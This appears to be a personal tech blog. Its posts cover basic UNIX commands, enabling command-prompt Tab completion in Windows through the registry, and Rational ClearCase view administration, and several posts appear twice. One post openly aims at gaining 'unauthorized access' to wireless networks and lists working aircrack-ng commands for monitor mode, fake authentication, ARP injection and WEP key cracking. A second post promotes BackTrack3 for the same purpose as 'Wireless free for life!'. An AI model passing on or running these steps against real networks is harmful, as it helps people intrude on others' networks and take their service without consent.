Daily work require me to work faster and familiar with the OS.
UNIX OS is one of them.
Here some unix command help my daily life:
ls - list file
chmod - change file permission
umask - set default file/directory creation permission
rm - remove
rmdir - remove directory
touch filename - create new file
mkdir - create new directory
References:
UNIX Tutorial for Beginners http://www.ee.surrey.ac.uk/Teaching/Unix/
Friday, May 8, 2009
Friday, February 20, 2009
Ease my typing in Windows command prompt
I love the command prompt UI, to ease the typing auto-complete feature is available.
I'm happy that Windows have this feature.
But is a bit messy because you need to enable it manually.
Here is the info and reference page:
SUMMARY
File name completion and folder name completion are quick-search features of the Windows NT command processor, Cmd.exe. When you type a path or a file name and then press TAB, Cmd.exe searches for all files whose path and file name match your entry.
NOTE: Automatic complete for CMD.exe is not enabled by default in Windows 2000 and later.
When you type a path and then press the TAB key, the command processor searches for all files whose path (but not necessarily the file name) matches your entry. The command processor displays one of the matching file names each time you press TAB. To go backward through the list of file names, press SHIFT+TAB. This article describes how to enable automatic complete for Cmd.exe.
MORE INFORMATION
Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756 How to back up and restore the registry in Windows
To enable automatic complete for Cmd.exe, use Registry Editor (Regedt32.exe) to view the following registry key:
HKEY_CURRENT_USER/Software/Microsoft/Command Processor
Edit the CompletionChar value, and set the value of REG_DWORD to 9. Note that you do not need to restart your computer.
APPLIES TO
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional Edition
Microsoft Windows NT Server 4.0 Standard Edition
Microsoft Windows NT Workstation 4.0 Developer Edition
http://technet.microsoft.com/en-us/kb/kb00244407.aspx
I'm happy that Windows have this feature.
But is a bit messy because you need to enable it manually.
Here is the info and reference page:
SUMMARY
File name completion and folder name completion are quick-search features of the Windows NT command processor, Cmd.exe. When you type a path or a file name and then press TAB, Cmd.exe searches for all files whose path and file name match your entry.
NOTE: Automatic complete for CMD.exe is not enabled by default in Windows 2000 and later.
When you type a path and then press the TAB key, the command processor searches for all files whose path (but not necessarily the file name) matches your entry. The command processor displays one of the matching file names each time you press TAB. To go backward through the list of file names, press SHIFT+TAB. This article describes how to enable automatic complete for Cmd.exe.
MORE INFORMATION
Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756 How to back up and restore the registry in Windows
To enable automatic complete for Cmd.exe, use Registry Editor (Regedt32.exe) to view the following registry key:
HKEY_CURRENT_USER/Software/Microsoft/Command Processor
Edit the CompletionChar value, and set the value of REG_DWORD to 9. Note that you do not need to restart your computer.
APPLIES TO
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional Edition
Microsoft Windows NT Server 4.0 Standard Edition
Microsoft Windows NT Workstation 4.0 Developer Edition
http://technet.microsoft.com/en-us/kb/kb00244407.aspx
Friday, January 2, 2009
Better Tools for Hacking Wireless
There is good tools to reduce time to start hacking wireless AP.
It's reduce your time to setup your environment before start using aircrack to hack.
The tool is Backtrack3 (Kindly read the supported Wireless Adaptor before purchasing them):
www.remote-exploit.org/backtrack.html
To understand more on Backtrack 3:
http://en.wikipedia.org/wiki/BackTrack
It works well for me =P
"Wireless free for life!"
It's reduce your time to setup your environment before start using aircrack to hack.
The tool is Backtrack3 (Kindly read the supported Wireless Adaptor before purchasing them):
www.remote-exploit.org/backtrack.html
To understand more on Backtrack 3:
http://en.wikipedia.org/wiki/BackTrack
It works well for me =P
"Wireless free for life!"
Sunday, May 18, 2008
Thursday, May 8, 2008
My first experience in WEP hacking
Is been years I thinking and wonder how to hack AP to get unauthorized access into wireless network.
I finally done it. Thanks to my friend provide me supported hardware (WG2000 with chipset zd1211) and a friend with kernel hacker expert :)
Here is the operating system environment:
FedoraCore 6 (kernel version 2.6.23.17)
- ieee80211.patch
- zd12111_firmware1.4
- zd1211rw.patch
Hacking WEP steps:
0. Enable Wireless adaptor with monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0
1. View surounding APs
-> airodump-ng
-> airodump-ng wlan0
2. Target single AP and Channel, then start capturing the packet info
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]
3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]
4. Keep fake authenication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac][adaptor_interface]
5. Make packet injection with arp attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]
6. Crack the AP KEY with.cap
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap
Steps 5 and 6 can be executed parallel :D
I finally done it. Thanks to my friend provide me supported hardware (WG2000 with chipset zd1211) and a friend with kernel hacker expert :)
Here is the operating system environment:
FedoraCore 6 (kernel version 2.6.23.17)
- ieee80211.patch
- zd12111_firmware1.4
- zd1211rw.patch
Hacking WEP steps:
0. Enable Wireless adaptor with monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0
1. View surounding APs
-> airodump-ng
-> airodump-ng wlan0
2. Target single AP and Channel, then start capturing the packet info
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]
3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]
4. Keep fake authenication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac][adaptor_interface]
5. Make packet injection with arp attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]
6. Crack the AP KEY with
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap
Steps 5 and 6 can be executed parallel :D
Tuesday, May 6, 2008
Search for latest version of branch type
To search latest version number for specific branch type:
cleartool find /vobs/vobname -branch "brtype(branchtypename)" -version "version(.../branchtypename/LATEST)" -print tee brantypelist.txt
The example result will be:
/vobs/vobname/filename1@@/main/branchtypename/3
/vobs/vobname/filename2@@/main/branchtypename/2
/vobs/vobname/filename3@@/main/branchtypename/6
Wednesday, August 1, 2007
Remove Corrupted View in Rational ClearCase
Objective: Remove Corrupted View
Error message below you get when you remove a view failed where the view is corrupted
cleartool rmview -tag viewname
cleartool: Error: Unable to open file"/view_stg/viewname.vws/.view": No such file or directory.
cleartool: Error: /view_stg/viewname.vws isn't a view: No such file or directory
cleartool: Error: Unable to remove view "/view_stg/viewname.vws".
Steps to remove the corrupted view:
1. list the view detail to get uuid
cleartool lsview -long viewname
Tag: viewname
Global path: /view_stg/viewname.vws
Server host: servername
Region: region_ux
Active: NO View tag
uuid:9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View on host: zmy12vw1
View server access path: /view_stg/viewname.vws
View uuid: 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View owner: you
2. Then try remove the view again with uuid
cleartool rmview -vob /vobname -uuid 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
Can't remove view "/view_stg/viewname.vws" from VOB while view still exists.
Remove view /view_stg/viewname.vws" references from VOB anyway? [no] y
Removed references to view "9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79" from VOB "/vobname".
3. Lastly remove the view tag after all the vob references are removed
cleartool rmtag -view viewname
Reference:
http://www.philforhumanity.com/ClearCase_Support_4.html
http://publib.boulder.ibm.com/infocenter/cchelp/v7r0m0/index.jsp?topic=/com.ibm.rational.clearcase.books.cc_admin.doc/view-admin.htm
Error message below you get when you remove a view failed where the view is corrupted
cleartool rmview -tag viewname
cleartool: Error: Unable to open file"/view_stg/viewname.vws/.view": No such file or directory.
cleartool: Error: /view_stg/viewname.vws isn't a view: No such file or directory
cleartool: Error: Unable to remove view "/view_stg/viewname.vws".
Steps to remove the corrupted view:
1. list the view detail to get uuid
cleartool lsview -long viewname
Tag: viewname
Global path: /view_stg/viewname.vws
Server host: servername
Region: region_ux
Active: NO View tag
uuid:9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View on host: zmy12vw1
View server access path: /view_stg/viewname.vws
View uuid: 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View owner: you
2. Then try remove the view again with uuid
cleartool rmview -vob /vobname -uuid 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
Can't remove view "/view_stg/viewname.vws" from VOB while view still exists.
Remove view /view_stg/viewname.vws" references from VOB anyway? [no] y
Removed references to view "9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79" from VOB "/vobname".
3. Lastly remove the view tag after all the vob references are removed
cleartool rmtag -view viewname
Reference:
http://www.philforhumanity.com/ClearCase_Support_4.html
http://publib.boulder.ibm.com/infocenter/cchelp/v7r0m0/index.jsp?topic=/com.ibm.rational.clearcase.books.cc_admin.doc/view-admin.htm
Subscribe to:
Posts (Atom)